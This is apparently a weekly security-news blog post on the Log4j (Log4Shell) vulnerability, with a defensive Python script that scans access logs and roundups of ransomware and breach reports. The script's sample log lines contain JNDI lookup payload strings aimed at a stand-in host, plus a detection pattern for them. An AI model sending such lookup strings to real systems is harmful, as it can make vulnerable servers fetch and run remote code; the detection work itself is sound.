Hello and welcome back to the GlobalSign blog!
This week everyone is talking about the Log4J vulnerability.
What is the Log4J vulnerability? As F5Labs explains in this article published on December 12, the Log4J vulnerability was discovered in a piece of free, open-source software called log4j. It is used by thousands of websites and applications to perform functions such as logging information for use by that website's developers, for debugging and other purposes.
This particular software has a previously undiscovered security vulnerability: when data sent to it through that website contains a special sequence of characters, log4j automatically fetches additional software from an external website and runs it. If a cyberattacker exploits this, they can make the server that is running log4j run any software they want, including software that can completely take over that server, which is known as a Remote Code Execution (RCE) attack.
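Because the trigger is a specific lookup string inside data that gets logged, a defender's first question is usually whether that string has already shown up in their own request logs. The script below is an added example written for this post (it is not code from GlobalSign, F5Labs or the Apache project): it parses a few constructed access-log lines in Combined Log Format, URL-decodes the request, referer and user-agent fields, and flags any entry carrying the `${jndi:<scheme>:` lookup syntax. The IP addresses, timestamps and the `lookup.invalid` host are all made up for the example; the regular expressions and field names are the author's assumptions, not part of any product.

```python
"""Flag HTTP access-log entries that carry a Log4j JNDI lookup string.

Added example for this post; every log line below is constructed, and the
detection pattern is an assumption of this example, not an official rule.
"""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Combined Log Format); not real traffic.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [11/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"${jndi:ldap://lookup.invalid:1389/a}"',
    '198.51.100.7 - - [11/Dec/2021:10:02:11 +0000] '
    '"GET /search?q=%24%7Bjndi%3Armi%3A%2F%2Flookup.invalid%2Fb%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    # Lookup-style syntax that is NOT a JNDI lookup; must not be flagged.
    '203.0.113.5 - - [11/Dec/2021:10:03:00 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# Combined Log Format: ip ident user [timestamp] "request" status bytes "referer" "user-agent"
CLF_PATTERN = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The lookup prefix log4j acts on: "${jndi:<scheme>:..." (case-insensitive).
# The captured scheme (ldap, ldaps, rmi, dns, ...) tells you which resolver was requested.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

# Request-derived fields that web servers commonly hand to application loggers.
CHECKED_FIELDS = ("req", "ref", "ua")


def find_jndi_lookups(lines):
    """Return one finding per log line/field pair that contains a JNDI lookup.

    Each finding records the line number, client IP, which field carried the
    string and the lookup scheme, so it can be fed to a SIEM or a triage sheet.
    """
    findings = []
    for line_no, line in enumerate(lines, start=1):
        match = CLF_PATTERN.match(line)
        if not match:
            continue  # malformed line; a real pipeline would count these separately
        for field in CHECKED_FIELDS:
            # Percent-decode so URL-encoded copies of the string are also seen.
            decoded = unquote(match.group(field))
            hit = JNDI_PATTERN.search(decoded)
            if hit:
                findings.append({
                    "line": line_no,
                    "source_ip": match.group("ip"),
                    "field": field,
                    "scheme": hit.group(1).lower(),
                })
    return findings


def sources_to_review(findings):
    """Collapse findings to the distinct client IPs that sent lookup strings."""
    return sorted({f["source_ip"] for f in findings})


if __name__ == "__main__":
    results = find_jndi_lookups(SAMPLE_LOG_LINES)
    for f in results:
        print(f"line {f['line']}: {f['source_ip']} sent a jndi:{f['scheme']} lookup in {f['field']}")
    print("client IPs to review:", sources_to_review(results))
```

A hit in this output means the string reached your web tier, not that the application logged it or that a vulnerable log4j version processed it; it is a prompt to check which services sit behind that endpoint and whether they have been upgraded to the fixed release the article below refers to. Running the same check over application logs (which is where log4j actually sees the data) gives a closer answer than the access log alone.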
The consequences of the vulnerability are severe enough for WIRED to describe the situation in this article as ‘The Internet Is on Fire’. Ars Technica adds that “The list of services with Internet-facing infrastructure that is vulnerable to a critical zero-day vulnerability in the open source Log4j logging utility is immense and reads like a who’s who of the biggest names on the Internet, including Apple, Amazon, Cloudflare, Steam, Tesla, Twitter, and Baidu.”
Until the vulnerability is dealt with, cyber criminals can steal both money and data.
Volunteers from the Apache Software Foundation are working around the clock on a fix, since Log4j is a Java-based logging utility that is part of the Apache Logging Services, a project of the Apache Software Foundation. The Wall Street Journal spoke with one of the volunteers in this piece (the link is also below).
In non-Log4J news…
- Brazil's Ministry of Health has suffered a second cyberattack in less than a week, which has compromised various internal systems, including the platform that holds COVID-19 vaccination data.
- Volvo Cars has confirmed a limited amount of its research and development property was stolen when a third party illegally accessed one of its file repositories. There may have been an impact on the company's operation, officials confirmed in a disclosure shared on Dec. 10. After detecting the breach, Volvo implemented countermeasures, including steps to prevent further access to its property, and alerted authorities.
- George Washington University’s law school has been dealing with a third-party vendor “compromise,” which left students unable to access materials and previous assignments during exams.
- HR software provider Kronos was hit by a ransomware attack last weekend that resulted in an outage of its UKG Workforce Central, UKG TeleStaff, Healthcare Extensions, and Banking Scheduling Solutions services. A company VP says it may take "up to several weeks" for the systems supporting those services to come back online.
- Researchers at security firm Wordfence Security say as many as 1.6 million WordPress sites have been targeted by an active large-scale attack campaign originating from 16,000 IP addresses that exploits weaknesses in four plugins and 15 Epsilon Framework themes. They report seeing more than 13.7 million different attack attempts over a 36-hour period, all of them aimed at those four WordPress plugins and several Epsilon Framework themes.
That’s a wrap for the week. Thanks again for stopping by our blog, and have a great weekend!
Top Global Security News
CRN (December 15, 2021) Nation-State, Ransomware Groups Using Log4j Bug In Attacks
"A variety of state-sponsored threat actors, ransomware groups and ransomware access brokers have begun leveraging the Log4j vulnerability in active attacks, Microsoft and other IT vendors reported.
The Redmond, Wash.-based software giant said Tuesday that government-backed adversaries in China, Iran, North Korea, and Turkey have exploited the Log4j bug against targets to further the hackers’ objectives. Nation-state activity associated with the Log4j flaw ranges from experimentation during development to integrating the vulnerability into in-the-wild payload development, Microsoft said.
Microsoft specifically called out Iranian ransomware group Phosphorus for acquiring, making modifications, and operationalizing modifications to the Log4j exploit. In addition, Microsoft said Chinese threat actor Hafnium has capitalized on Log4j to extend their typical targeting by attacking virtualization infrastructure."
Bleeping Computer (December 14, 2021) CISA orders federal agencies to patch Log4Shell by December 24th
"The Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch systems against the critical Log4Shell vulnerability and released mitigation guidance in response to active exploitation.
This follows threat actors' head start in scanning for and exploiting Log4Shell vulnerable systems to deploy malware.
"CISA urges organizations to review its Apache Log4j Vulnerability Guidance webpage and upgrade to Log4j version 2.15.0, or apply the appropriate vendor recommended mitigations immediately," the cybersecurity agency said."
ZDNet (December 14, 2021) Brazilian Ministry of Health hit by second cyberattack in less than a week
"Brazil's Ministry of Health has suffered a second cyberattack in less than a week, which has compromised various internal systems, including the platform that holds COVID-19 vaccination data.
The news emerged after a first major ransomware attack three days earlier, from which the department was still recovering. Confirming the second attack on Monday (13) evening, health minister Marcelo Queiroga said the latest event, which took place in the early hours of that same day, was smaller than the first attack.
According to Queiroga, the department is working to recover the systems as soon as possible. However, he said the second attack means ConecteSUS, the platform that issues COVID-19 vaccine certificates, would not be back online today (14) as originally planned."
EdScoop (December 14, 2021) Third-party 'compromise' interrupts GW law students' exam prep
"George Washington University’s law school is managing the fallout from a third-party vendor “compromise,” which left students unable to access materials and previous assignments during exams.
Some take-home assignments could have been lost in the MyLaw platform outage on Friday, as well as some personal information like course schedules, the GW Hatchet, the independent student newspaper, reported Monday. The outage isn’t affecting the exam schedule, GW Law Dean Dana Bowen Matthew said in a video message to students posted by the Hatchet. In the message, Bowen Matthew did not refer to the outage as an attack, but just stated that the MyLaw platform was compromised.
The department is investigating the outage and working with the vendor to bring it back up, according to the GW information technology website. IT is also working on an outage related to a ransomware attack on the payroll system provider Kronos, which is affecting the university systems."
Dark Reading (December 13, 2021) Kronos Suffers Ransomware Attack, Expects Full Restoration to Take 'Weeks'
"Kronos Private Cloud was hit by a ransomware attack over the weekend that resulted in an outage of the HR services firm's UKG Workforce Central, UKG TeleStaff, Healthcare Extensions, and Banking Scheduling Solutions services.
Kronos executive vice president Bob Hughes said in a post that it may take "up to several weeks" for the systems supporting those services to come back online, so customers should "evaluate and implement alternative business continuity protocols related to the affected UKG solutions."
Kronos' UKG Pro, UKG Ready, UKG Dimensions, and other UKG products outside its Private Cloud offerings were not hit in the attack."
Dark Reading (December 13, 2021) Volvo Confirms R&D Data Stolen in Breach
"Volvo Cars has confirmed a limited amount of its R&D property was stolen when a third party illegally accessed one of its file repositories.
There may have been an impact on the company's operation, officials confirmed in a disclosure shared on Dec. 10. After detecting the breach, Volvo implemented countermeasures, including steps to prevent further access to its property, and alerted authorities."
Other Industry News
Global Fight Against Log4j Vulnerability Relies on Apache Volunteers - Wall Street Journal Pro (Requires subscription)